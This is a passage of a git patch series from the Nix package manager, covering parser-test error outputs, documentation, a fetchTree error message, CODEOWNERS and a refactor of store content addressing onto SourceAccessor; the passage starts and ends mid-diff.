+1,6 @@ error: … while evaluating an attribute name - at /pwd/lang/eval-fail-using-set-as-attr-name.nix:5:10: - 4| in 5| attr.${key} | ^ 
diff --git a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp index 4fe6b7a1f..6c3a3510c 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp @@ -1,7 +1,5 @@ error: attribute 'x' already defined at «stdin»:1:3 - at «stdin»:3:3: - 2| y = 456; 3| x = 789; | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp index 3aba2891f..fecdece20 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp @@ -1,7 +1,5 @@ error: attribute 'x' already defined at «stdin»:9:5 - at «stdin»:10:17: - 9| x = 789; 10| inherit (as) x; | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp index 3aba2891f..fecdece20 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp @@ -1,7 +1,5 @@ error: attribute 'x' already defined at «stdin»:9:5 - at «stdin»:10:17: - 9| x = 789; 10| inherit (as) x; | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp index ff68446a1..f85ffea51 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp @@ -1,7 +1,5 @@ error: attribute 'services.ssh.port' already defined at «stdin»:2:3 - at «stdin»:3:3: - 2| services.ssh.port = 22; 3| services.ssh.port = 23; | ^ diff --git a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp index 512a499ca..98cea9dae 100644 --- a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp +++ b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp @@ -1,7 +1,5 @@ error: attribute 'x' already defined at «stdin»:6:12 - at «stdin»:7:12: - 6| inherit x; 
7| inherit x; | ^ diff --git a/tests/functional/lang/parse-fail-dup-formals.err.exp b/tests/functional/lang/parse-fail-dup-formals.err.exp index 1d566fb33..d7c7e0237 100644 --- a/tests/functional/lang/parse-fail-dup-formals.err.exp +++ b/tests/functional/lang/parse-fail-dup-formals.err.exp @@ -1,6 +1,4 @@ error: duplicate formal function argument 'x' - at «stdin»:1:8: - 1| {x, y, x}: x | ^ diff --git a/tests/functional/lang/parse-fail-eof-in-string.err.exp b/tests/functional/lang/parse-fail-eof-in-string.err.exp index f9fa72312..b28d35950 100644 --- a/tests/functional/lang/parse-fail-eof-in-string.err.exp +++ b/tests/functional/lang/parse-fail-eof-in-string.err.exp @@ -1,7 +1,5 @@ error: syntax error, unexpected end of file, expecting '"' - at «stdin»:3:5: - 2| # Note that this file must not end with a newline. 3| a 1"$ | ^ diff --git a/tests/functional/lang/parse-fail-mixed-nested-attrs1.err.exp b/tests/functional/lang/parse-fail-mixed-nested-attrs1.err.exp index 32f776795..a4472156b 100644 --- a/tests/functional/lang/parse-fail-mixed-nested-attrs1.err.exp +++ b/tests/functional/lang/parse-fail-mixed-nested-attrs1.err.exp @@ -1,7 +1,5 @@ error: attribute 'z' already defined at «stdin»:3:16 - at «stdin»:2:3: - 1| { 2| x.z = 3; | ^ diff --git a/tests/functional/lang/parse-fail-mixed-nested-attrs2.err.exp b/tests/functional/lang/parse-fail-mixed-nested-attrs2.err.exp index 0437cd50c..ead1f0dbd 100644 --- a/tests/functional/lang/parse-fail-mixed-nested-attrs2.err.exp +++ b/tests/functional/lang/parse-fail-mixed-nested-attrs2.err.exp @@ -1,7 +1,5 @@ error: attribute 'y' already defined at «stdin»:3:9 - at «stdin»:2:3: - 1| { 2| x.y.y = 3; | ^ diff --git a/tests/functional/lang/parse-fail-patterns-1.err.exp b/tests/functional/lang/parse-fail-patterns-1.err.exp index 634a04aaa..6ba39d884 100644 --- a/tests/functional/lang/parse-fail-patterns-1.err.exp +++ b/tests/functional/lang/parse-fail-patterns-1.err.exp @@ -1,7 +1,5 @@ error: duplicate formal function argument 
'args' - at «stdin»:1:1: - 1| args@{args, x, y, z}: x | ^ 2| diff --git a/tests/functional/lang/parse-fail-regression-20060610.err.exp b/tests/functional/lang/parse-fail-regression-20060610.err.exp index 167d01e85..d8875a6a5 100644 --- a/tests/functional/lang/parse-fail-regression-20060610.err.exp +++ b/tests/functional/lang/parse-fail-regression-20060610.err.exp @@ -1,7 +1,5 @@ error: undefined variable 'gcc' - at «stdin»:8:12: - 7| 8| body = ({ | ^ diff --git a/tests/functional/lang/parse-fail-undef-var-2.err.exp b/tests/functional/lang/parse-fail-undef-var-2.err.exp index 77c96bbd2..a58d8dca4 100644 --- a/tests/functional/lang/parse-fail-undef-var-2.err.exp +++ b/tests/functional/lang/parse-fail-undef-var-2.err.exp @@ -1,7 +1,5 @@ error: syntax error, unexpected ':', expecting '}' - at «stdin»:3:13: - 2| 3| f = {x, y : | ^ diff --git a/tests/functional/lang/parse-fail-undef-var.err.exp b/tests/functional/lang/parse-fail-undef-var.err.exp index 48e88747f..3d143d9af 100644 --- a/tests/functional/lang/parse-fail-undef-var.err.exp +++ b/tests/functional/lang/parse-fail-undef-var.err.exp @@ -1,7 +1,5 @@ error: undefined variable 'y' - at «stdin»:1:4: - 1| x: y | ^ 2| diff --git a/tests/functional/lang/parse-fail-utf8.err.exp b/tests/functional/lang/parse-fail-utf8.err.exp index 6087479a3..e83abdb9e 100644 --- a/tests/functional/lang/parse-fail-utf8.err.exp +++ b/tests/functional/lang/parse-fail-utf8.err.exp @@ -1,6 +1,4 @@ error: syntax error, unexpected invalid token, expecting end of file - at «stdin»:1:5: - 1| 123 | ^ From 7f5ed330e40d0aa2a2f907b2d4157329ff953cd2 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 16 Dec 2023 07:05:31 -0500 Subject: [PATCH 129/654] Document `Makefile` variables in `hacking.md` (#9620) --- doc/manual/src/contributing/hacking.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 4d3d66397..421ac981c 100644 --- 
a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -64,6 +64,15 @@ $ nix build You can also build Nix for one of the [supported platforms](#platforms). +## Makefile variables + +- `ENABLE_BUILD=yes` to enable building the C++ code. +- `ENABLE_TESTS=yes` to enable building the tests. +- `OPTIMIZE=1` to enable optimizations. +- `doc_generate=yes` to enable building the documentation (manual, man pages, etc.). + + The docs can take a while to build, so you may want to disable this for local development. + ## Building Nix To build all dependencies and start a shell in which all environment variables are set up so that those dependencies can be found: From c05d4fadd5f0943de0a00b17c85626d73152da66 Mon Sep 17 00:00:00 2001 From: David Arnold Date: Sat, 16 Dec 2023 23:07:17 +0100 Subject: [PATCH 130/654] fix: valid branch name --- src/libutil/url-parts.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index 07bc8d0cd..e968eea4b 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -25,7 +25,7 @@ const static std::string pathRegex = "(?:" + segmentRegex + "(?:/" + segmentRege /// A Git ref (i.e. branch or tag name). /// \todo check that this is correct. 
-const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@-]*"; +const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@-+]*"; extern std::regex refRegex; /// Instead of defining what a good Git Ref is, we define what a bad Git Ref is From 06bed2eacdeaa3b92d6e35c5d2133c31baa9e56f Mon Sep 17 00:00:00 2001 From: Julia Evans Date: Sun, 17 Dec 2023 12:00:50 -0500 Subject: [PATCH 131/654] Make fetchTree locked input error message clearer --- src/libexpr/primops/fetchTree.cc | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index eb2df8626..fa503665e 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -167,7 +167,10 @@ static void fetchTree( input = lookupInRegistries(state.store, input).first; if (evalSettings.pureEval && !input.isLocked()) - state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); + if (type == "git") + state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchGit' requires a locked input, at %s", state.positions[pos])); + else + state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); state.checkURI(input.toURLString()); From a47fabff0dbcd63e2645db7336dde5865a1995c4 Mon Sep 17 00:00:00 2001 From: Julia Evans Date: Sun, 17 Dec 2023 12:14:55 -0500 Subject: [PATCH 132/654] use params.isFetchGit instead to check if it came from fetchGit --- src/libexpr/primops/fetchTree.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index fa503665e..505900b30 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -167,7 +167,7 @@ static void fetchTree( input = lookupInRegistries(state.store, input).first; if (evalSettings.pureEval && !input.isLocked()) - 
if (type == "git") + if (params.isFetchGit) state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchGit' requires a locked input, at %s", state.positions[pos])); else state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); From 4f9580085441a4255ce746a4cc498b45cc25a899 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Mon, 18 Dec 2023 11:41:52 +0100 Subject: [PATCH 133/654] add cross-reference --- src/libstore/globals.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index e28615cdc..b35dc37a1 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -631,7 +631,7 @@ public: At least one of the following condition must be met for Nix to accept copying a store object from another - Nix store (such as a substituter): + Nix store (such as a [substituter](#conf-substituters)): - the store object has been signed using a key in the trusted keys list - the [`require-sigs`](#conf-require-sigs) option has been set to `false` From d19a6675286a38edf8970459cbf454322f8151cb Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Mon, 18 Dec 2023 13:54:40 +0100 Subject: [PATCH 134/654] CODEOWNERS: unsubscribe fricklerhandwerk (#9614) --- .github/CODEOWNERS | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 39d595199..526fecabf 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -10,16 +10,8 @@ # This file .github/CODEOWNERS @edolstra -# Public documentation -/doc @fricklerhandwerk -*.md @fricklerhandwerk - # Documentation of built-in functions -src/libexpr/primops.cc @fricklerhandwerk @roberth -# Documentation on experimental features -src/libutil/experimental-features.cc @fricklerhandwerk -# Documentation on configuration settings -src/libstore/globals.hh @fricklerhandwerk +src/libexpr/primops.cc @roberth # Libstore layer 
/src/libstore @thufschmitt From dfc876531f269950a4e183a4f77a813c421d7d64 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 4 Nov 2023 16:25:41 -0400 Subject: [PATCH 135/654] Organize content addressing, use `SourceAccessor` with `Store::addToStore` Co-authored-by: Robert Hensing --- perl/lib/Nix/Store.xs | 12 ++- src/libcmd/installable-value.cc | 2 +- src/libexpr/eval.cc | 2 +- src/libexpr/primops.cc | 2 +- src/libfetchers/cache.cc | 16 ++-- src/libfetchers/cache.hh | 6 +- src/libfetchers/fetchers.cc | 2 +- src/libfetchers/git.cc | 4 +- src/libfetchers/github.cc | 4 +- src/libfetchers/input-accessor.cc | 39 ++++++--- src/libfetchers/input-accessor.hh | 8 +- src/libfetchers/mercurial.cc | 25 ++++-- src/libfetchers/tarball.cc | 14 +-- src/libstore/binary-cache-store.cc | 56 ++++++------ src/libstore/binary-cache-store.hh | 24 ++++-- src/libstore/build/local-derivation-goal.cc | 90 +++++++++---------- src/libstore/build/worker.cc | 4 +- src/libstore/content-address.cc | 28 ++++-- src/libstore/content-address.hh | 38 ++++----- src/libstore/daemon.cc | 19 +---- src/libstore/legacy-ssh-store.hh | 15 ++-- src/libstore/local-store.cc | 95 ++++++++------------- src/libstore/local-store.hh | 22 ++--- src/libstore/optimise-store.cc | 15 +++- src/libstore/remote-store.cc | 9 +- src/libstore/remote-store.hh | 11 ++- src/libstore/store-api.cc | 90 ++++++++++--------- src/libstore/store-api.hh | 36 +++++--- src/libstore/store-dir-config.hh | 14 +-- src/libutil/file-content-address.cc | 49 +++++++++++ src/libutil/file-content-address.hh | 56 ++++++++++++ src/libutil/hash.cc | 9 -- src/libutil/hash.hh | 7 +- src/nix-store/nix-store.cc | 20 ++++- src/nix/add-to-store.cc | 42 +++------ src/nix/hash.cc | 11 +-- src/nix/prefetch.cc | 7 +- tests/unit/libexpr/primops.cc | 2 +- 38 files changed, 515 insertions(+), 390 deletions(-) create mode 100644 src/libutil/file-content-address.cc create mode 100644 src/libutil/file-content-address.hh diff --git a/perl/lib/Nix/Store.xs 
b/perl/lib/Nix/Store.xs index 82c7db608..4964b8a34 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -13,6 +13,7 @@ #include "globals.hh" #include "store-api.hh" #include "crypto.hh" +#include "posix-source-accessor.hh" #include #include @@ -205,7 +206,10 @@ void importPaths(int fd, int dontCheckSigs) SV * hashPath(char * algo, int base32, char * path) PPCODE: try { - Hash h = hashPath(parseHashAlgo(algo), path).first; + PosixSourceAccessor accessor; + Hash h = hashPath( + accessor, CanonPath::fromCwd(path), + FileIngestionMethod::Recursive, parseHashAlgo(algo)).first; auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { @@ -281,7 +285,11 @@ SV * addToStore(char * srcPath, int recursive, char * algo) PPCODE: try { auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; - auto path = store()->addToStore(std::string(baseNameOf(srcPath)), srcPath, method, parseHashAlgo(algo)); + PosixSourceAccessor accessor; + auto path = store()->addToStore( + std::string(baseNameOf(srcPath)), + accessor, CanonPath::fromCwd(srcPath), + method, parseHashAlgo(algo)); XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(path).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); diff --git a/src/libcmd/installable-value.cc b/src/libcmd/installable-value.cc index 08ad35105..bdc34bbe3 100644 --- a/src/libcmd/installable-value.cc +++ b/src/libcmd/installable-value.cc @@ -44,7 +44,7 @@ ref InstallableValue::require(ref installable) std::optional InstallableValue::trySinglePathToDerivedPaths(Value & v, const PosIdx pos, std::string_view errorCtx) { if (v.type() == nPath) { - auto storePath = v.path().fetchToStore(state->store); + auto storePath = v.path().fetchToStore(*state->store); return {{ .path = DerivedPath::Opaque { .path = std::move(storePath), diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 1552e3e92..c9c25c898 100644 --- 
a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2317,7 +2317,7 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat auto dstPath = i != srcToStore.end() ? i->second : [&]() { - auto dstPath = path.fetchToStore(store, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); + auto dstPath = path.fetchToStore(*store, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); allowPath(dstPath); srcToStore.insert_or_assign(path, dstPath); printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath)); diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index d78a28c73..75ee1e38d 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -2229,7 +2229,7 @@ static void addPath( }); if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { - auto dstPath = path.fetchToStore(state.store, name, method, filter.get(), state.repair); + auto dstPath = path.fetchToStore(*state.store, name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); state.allowAndSetStorePathString(dstPath, v); diff --git a/src/libfetchers/cache.cc b/src/libfetchers/cache.cc index 63b05bdab..e071b4717 100644 --- a/src/libfetchers/cache.cc +++ b/src/libfetchers/cache.cc @@ -106,7 +106,7 @@ struct CacheImpl : Cache } void add( - ref store, + Store & store, const Attrs & inAttrs, const Attrs & infoAttrs, const StorePath & storePath, @@ -115,13 +115,13 @@ struct CacheImpl : Cache _state.lock()->add.use() (attrsToJSON(inAttrs).dump()) (attrsToJSON(infoAttrs).dump()) - (store->printStorePath(storePath)) + (store.printStorePath(storePath)) (locked) (time(0)).exec(); } std::optional> lookup( - ref store, + Store & store, const Attrs & inAttrs) override { if (auto res = lookupExpired(store, inAttrs)) { @@ -134,7 +134,7 @@ struct CacheImpl : Cache } std::optional 
lookupExpired( - ref store, + Store & store, const Attrs & inAttrs) override { auto state(_state.lock()); @@ -148,19 +148,19 @@ struct CacheImpl : Cache } auto infoJSON = stmt.getStr(0); - auto storePath = store->parseStorePath(stmt.getStr(1)); + auto storePath = store.parseStorePath(stmt.getStr(1)); auto locked = stmt.getInt(2) != 0; auto timestamp = stmt.getInt(3); - store->addTempRoot(storePath); - if (!store->isValidPath(storePath)) { + store.addTempRoot(storePath); + if (!store.isValidPath(storePath)) { // FIXME: we could try to substitute 'storePath'. debug("ignoring disappeared cache entry '%s'", inAttrsJSON); return {}; } debug("using cache entry '%s' -> '%s', '%s'", - inAttrsJSON, infoJSON, store->printStorePath(storePath)); + inAttrsJSON, infoJSON, store.printStorePath(storePath)); return Result { .expired = !locked && (settings.tarballTtl.get() == 0 || timestamp + settings.tarballTtl < time(0)), diff --git a/src/libfetchers/cache.hh b/src/libfetchers/cache.hh index f70589267..791d77025 100644 --- a/src/libfetchers/cache.hh +++ b/src/libfetchers/cache.hh @@ -50,14 +50,14 @@ struct Cache /* Old cache for things that have a store path. 
*/ virtual void add( - ref store, + Store & store, const Attrs & inAttrs, const Attrs & infoAttrs, const StorePath & storePath, bool locked) = 0; virtual std::optional> lookup( - ref store, + Store & store, const Attrs & inAttrs) = 0; struct Result @@ -68,7 +68,7 @@ struct Cache }; virtual std::optional lookupExpired( - ref store, + Store & store, const Attrs & inAttrs) = 0; }; diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc index 7ec1f9802..f309e5993 100644 --- a/src/libfetchers/fetchers.cc +++ b/src/libfetchers/fetchers.cc @@ -374,7 +374,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const std::pair InputScheme::fetch(ref store, const Input & input) { auto [accessor, input2] = getAccessor(store, input); - auto storePath = SourcePath(accessor).fetchToStore(store, input2.getName()); + auto storePath = SourcePath(accessor).fetchToStore(*store, input2.getName()); return {storePath, input2}; } diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 5dac66930..01cd28427 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -368,14 +368,14 @@ struct GitInputScheme : InputScheme RepoInfo getRepoInfo(const Input & input) const { - auto checkHashType = [&](const std::optional & hash) + auto checkHashAlgorithm = [&](const std::optional & hash) { if (hash.has_value() && !(hash->algo == HashAlgorithm::SHA1 || hash->algo == HashAlgorithm::SHA256)) throw Error("Hash '%s' is not supported by Git. 
Supported types are sha1 and sha256.", hash->to_string(HashFormat::Base16, true)); }; if (auto rev = input.getRev()) - checkHashType(rev); + checkHashAlgorithm(rev); RepoInfo repoInfo; diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc index 70acb9354..498e41357 100644 --- a/src/libfetchers/github.cc +++ b/src/libfetchers/github.cc @@ -201,7 +201,7 @@ struct GitArchiveInputScheme : InputScheme {"rev", rev->gitRev()}, }); - if (auto res = getCache()->lookup(store, lockedAttrs)) { + if (auto res = getCache()->lookup(*store, lockedAttrs)) { input.attrs.insert_or_assign("lastModified", getIntAttr(res->first, "lastModified")); return {std::move(res->second), input}; } @@ -213,7 +213,7 @@ struct GitArchiveInputScheme : InputScheme input.attrs.insert_or_assign("lastModified", uint64_t(result.lastModified)); getCache()->add( - store, + *store, lockedAttrs, { {"rev", rev->gitRev()}, diff --git a/src/libfetchers/input-accessor.cc b/src/libfetchers/input-accessor.cc index 1f793bf1d..a647f5915 100644 --- a/src/libfetchers/input-accessor.cc +++ b/src/libfetchers/input-accessor.cc @@ -5,10 +5,10 @@ namespace nix { StorePath InputAccessor::fetchToStore( - ref store, + Store & store, const CanonPath & path, std::string_view name, - FileIngestionMethod method, + ContentAddressMethod method, PathFilter * filter, RepairFlag repair) { @@ -20,10 +20,24 @@ StorePath InputAccessor::fetchToStore( if (!filter && fingerprint) { cacheKey = fetchers::Attrs{ {"_what", "fetchToStore"}, - {"store", store->storeDir}, + {"store", store.storeDir}, {"name", std::string(name)}, {"fingerprint", *fingerprint}, - {"method", (uint8_t) method}, + { + "method", + std::visit(overloaded { + [](const TextIngestionMethod &) { + return "text"; + }, + [](const FileIngestionMethod & fim) { + switch (fim) { + case FileIngestionMethod::Flat: return "flat"; + case FileIngestionMethod::Recursive: return "nar"; + default: assert(false); + } + }, + }, method.raw), + }, {"path", path.abs()} }; if (auto 
res = fetchers::getCache()->lookup(store, *cacheKey)) { @@ -35,17 +49,14 @@ StorePath InputAccessor::fetchToStore( Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", showPath(path))); - auto source = sinkToSource([&](Sink & sink) { - if (method == FileIngestionMethod::Recursive) - dumpPath(path, sink, filter ? *filter : defaultPathFilter); - else - readFile(path, sink); - }); + auto filter2 = filter ? *filter : defaultPathFilter; auto storePath = settings.readOnlyMode - ? store->computeStorePathFromDump(*source, name, method, HashAlgorithm::SHA256).first - : store->addToStoreFromDump(*source, name, method, HashAlgorithm::SHA256, repair); + ? store.computeStorePath( + name, *this, path, method, HashAlgorithm::SHA256, {}, filter2).first + : store.addToStore( + name, *this, path, method, HashAlgorithm::SHA256, {}, filter2, repair); if (cacheKey) fetchers::getCache()->add(store, *cacheKey, {}, storePath, true); @@ -60,9 +71,9 @@ std::ostream & operator << (std::ostream & str, const SourcePath & path) } StorePath SourcePath::fetchToStore( - ref store, + Store & store, std::string_view name, - FileIngestionMethod method, + ContentAddressMethod method, PathFilter * filter, RepairFlag repair) const { diff --git a/src/libfetchers/input-accessor.hh b/src/libfetchers/input-accessor.hh index f385e6231..d2a21cb4b 100644 --- a/src/libfetchers/input-accessor.hh +++ b/src/libfetchers/input-accessor.hh @@ -30,10 +30,10 @@ struct InputAccessor : virtual SourceAccessor, std::enable_shared_from_this store, + Store & store, const CanonPath & path, std::string_view name = "source", - FileIngestionMethod method = FileIngestionMethod::Recursive, + ContentAddressMethod method = FileIngestionMethod::Recursive, PathFilter * filter = nullptr, RepairFlag repair = NoRepair); }; @@ -116,9 +116,9 @@ struct SourcePath * Copy this `SourcePath` to the Nix store. 
*/ StorePath fetchToStore( - ref store, + Store & store, std::string_view name = "source", - FileIngestionMethod method = FileIngestionMethod::Recursive, + ContentAddressMethod method = FileIngestionMethod::Recursive, PathFilter * filter = nullptr, RepairFlag repair = NoRepair) const; diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc index 6056b9a3c..9982389ab 100644 --- a/src/libfetchers/mercurial.cc +++ b/src/libfetchers/mercurial.cc @@ -6,6 +6,7 @@ #include "tarfile.hh" #include "store-api.hh" #include "url-parts.hh" +#include "posix-source-accessor.hh" #include "fetch-settings.hh" @@ -210,7 +211,12 @@ struct MercurialInputScheme : InputScheme return files.count(file); }; - auto storePath = store->addToStore(input.getName(), actualPath, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, filter); + PosixSourceAccessor accessor; + auto storePath = store->addToStore( + input.getName(), + accessor, CanonPath { actualPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {}, + filter); return {std::move(storePath), input}; } @@ -218,7 +224,7 @@ struct MercurialInputScheme : InputScheme if (!input.getRef()) input.attrs.insert_or_assign("ref", "default"); - auto checkHashType = [&](const std::optional & hash) + auto checkHashAlgorithm = [&](const std::optional & hash) { if (hash.has_value() && hash->algo != HashAlgorithm::SHA1) throw Error("Hash '%s' is not supported by Mercurial. 
Only sha1 is supported.", hash->to_string(HashFormat::Base16, true)); @@ -227,7 +233,7 @@ struct MercurialInputScheme : InputScheme auto getLockedAttrs = [&]() { - checkHashType(input.getRev()); + checkHashAlgorithm(input.getRev()); return Attrs({ {"type", "hg"}, @@ -246,7 +252,7 @@ struct MercurialInputScheme : InputScheme }; if (input.getRev()) { - if (auto res = getCache()->lookup(store, getLockedAttrs())) + if (auto res = getCache()->lookup(*store, getLockedAttrs())) return makeResult(res->first, std::move(res->second)); } @@ -259,7 +265,7 @@ struct MercurialInputScheme : InputScheme {"ref", *input.getRef()}, }); - if (auto res = getCache()->lookup(store, unlockedAttrs)) { + if (auto res = getCache()->lookup(*store, unlockedAttrs)) { auto rev2 = Hash::parseAny(getStrAttr(res->first, "rev"), HashAlgorithm::SHA1); if (!input.getRev() || input.getRev() == rev2) { input.attrs.insert_or_assign("rev", rev2.gitRev()); @@ -305,7 +311,7 @@ struct MercurialInputScheme : InputScheme auto revCount = std::stoull(tokens[1]); input.attrs.insert_or_assign("ref", tokens[2]); - if (auto res = getCache()->lookup(store, getLockedAttrs())) + if (auto res = getCache()->lookup(*store, getLockedAttrs())) return makeResult(res->first, std::move(res->second)); Path tmpDir = createTempDir(); @@ -315,7 +321,8 @@ struct MercurialInputScheme : InputScheme deletePath(tmpDir + "/.hg_archival.txt"); - auto storePath = store->addToStore(name, tmpDir); + PosixSourceAccessor accessor; + auto storePath = store->addToStore(name, accessor, CanonPath { tmpDir }); Attrs infoAttrs({ {"rev", input.getRev()->gitRev()}, @@ -324,14 +331,14 @@ struct MercurialInputScheme : InputScheme if (!_input.getRev()) getCache()->add( - store, + *store, unlockedAttrs, infoAttrs, storePath, false); getCache()->add( - store, + *store, getLockedAttrs(), infoAttrs, storePath, diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc index 086366180..3b7709440 100644 --- a/src/libfetchers/tarball.cc +++ 
b/src/libfetchers/tarball.cc @@ -8,6 +8,7 @@ #include "tarfile.hh" #include "types.hh" #include "split.hh" +#include "posix-source-accessor.hh" namespace nix::fetchers { @@ -26,7 +27,7 @@ DownloadFileResult downloadFile( {"name", name}, }); - auto cached = getCache()->lookupExpired(store, inAttrs); + auto cached = getCache()->lookupExpired(*store, inAttrs); auto useCached = [&]() -> DownloadFileResult { @@ -91,7 +92,7 @@ DownloadFileResult downloadFile( } getCache()->add( - store, + *store, inAttrs, infoAttrs, *storePath, @@ -99,7 +100,7 @@ DownloadFileResult downloadFile( if (url != res.effectiveUri) getCache()->add( - store, + *store, { {"type", "file"}, {"url", res.effectiveUri}, @@ -130,7 +131,7 @@ DownloadTarballResult downloadTarball( {"name", name}, }); - auto cached = getCache()->lookupExpired(store, inAttrs); + auto cached = getCache()->lookupExpired(*store, inAttrs); if (cached && !cached->expired) return { @@ -156,7 +157,8 @@ DownloadTarballResult downloadTarball( throw nix::Error("tarball '%s' contains an unexpected number of top-level files", url); auto topDir = tmpDir + "/" + members.begin()->name; lastModified = lstat(topDir).st_mtime; - unpackedStorePath = store->addToStore(name, topDir, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, defaultPathFilter, NoRepair); + PosixSourceAccessor accessor; + unpackedStorePath = store->addToStore(name, accessor, CanonPath { topDir }, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {}, defaultPathFilter, NoRepair); } Attrs infoAttrs({ @@ -168,7 +170,7 @@ DownloadTarballResult downloadTarball( infoAttrs.emplace("immutableUrl", *res.immutableUrl); getCache()->add( - store, + *store, inAttrs, infoAttrs, *unpackedStorePath, diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index 2837e8934..19aa283fc 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -300,8 +300,13 @@ void BinaryCacheStore::addToStore(const ValidPathInfo & info, 
Source & narSource }}); } -StorePath BinaryCacheStore::addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) +StorePath BinaryCacheStore::addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) { if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) unsupported("addToStoreFromDump"); @@ -309,15 +314,14 @@ StorePath BinaryCacheStore::addToStoreFromDump(Source & dump, std::string_view n ValidPathInfo info { *this, name, - FixedOutputInfo { - .method = method, - .hash = nar.first, - .references = { + ContentAddressWithReferences::fromParts( + method, + nar.first, + { .others = references, // caller is not capable of creating a self-reference, because this is content-addressed without modulus .self = false, - }, - }, + }), nar.first, }; info.narSize = nar.second; @@ -399,42 +403,36 @@ void BinaryCacheStore::queryPathInfoUncached(const StorePath & storePath, } StorePath BinaryCacheStore::addToStore( - std::string_view name, - const Path & 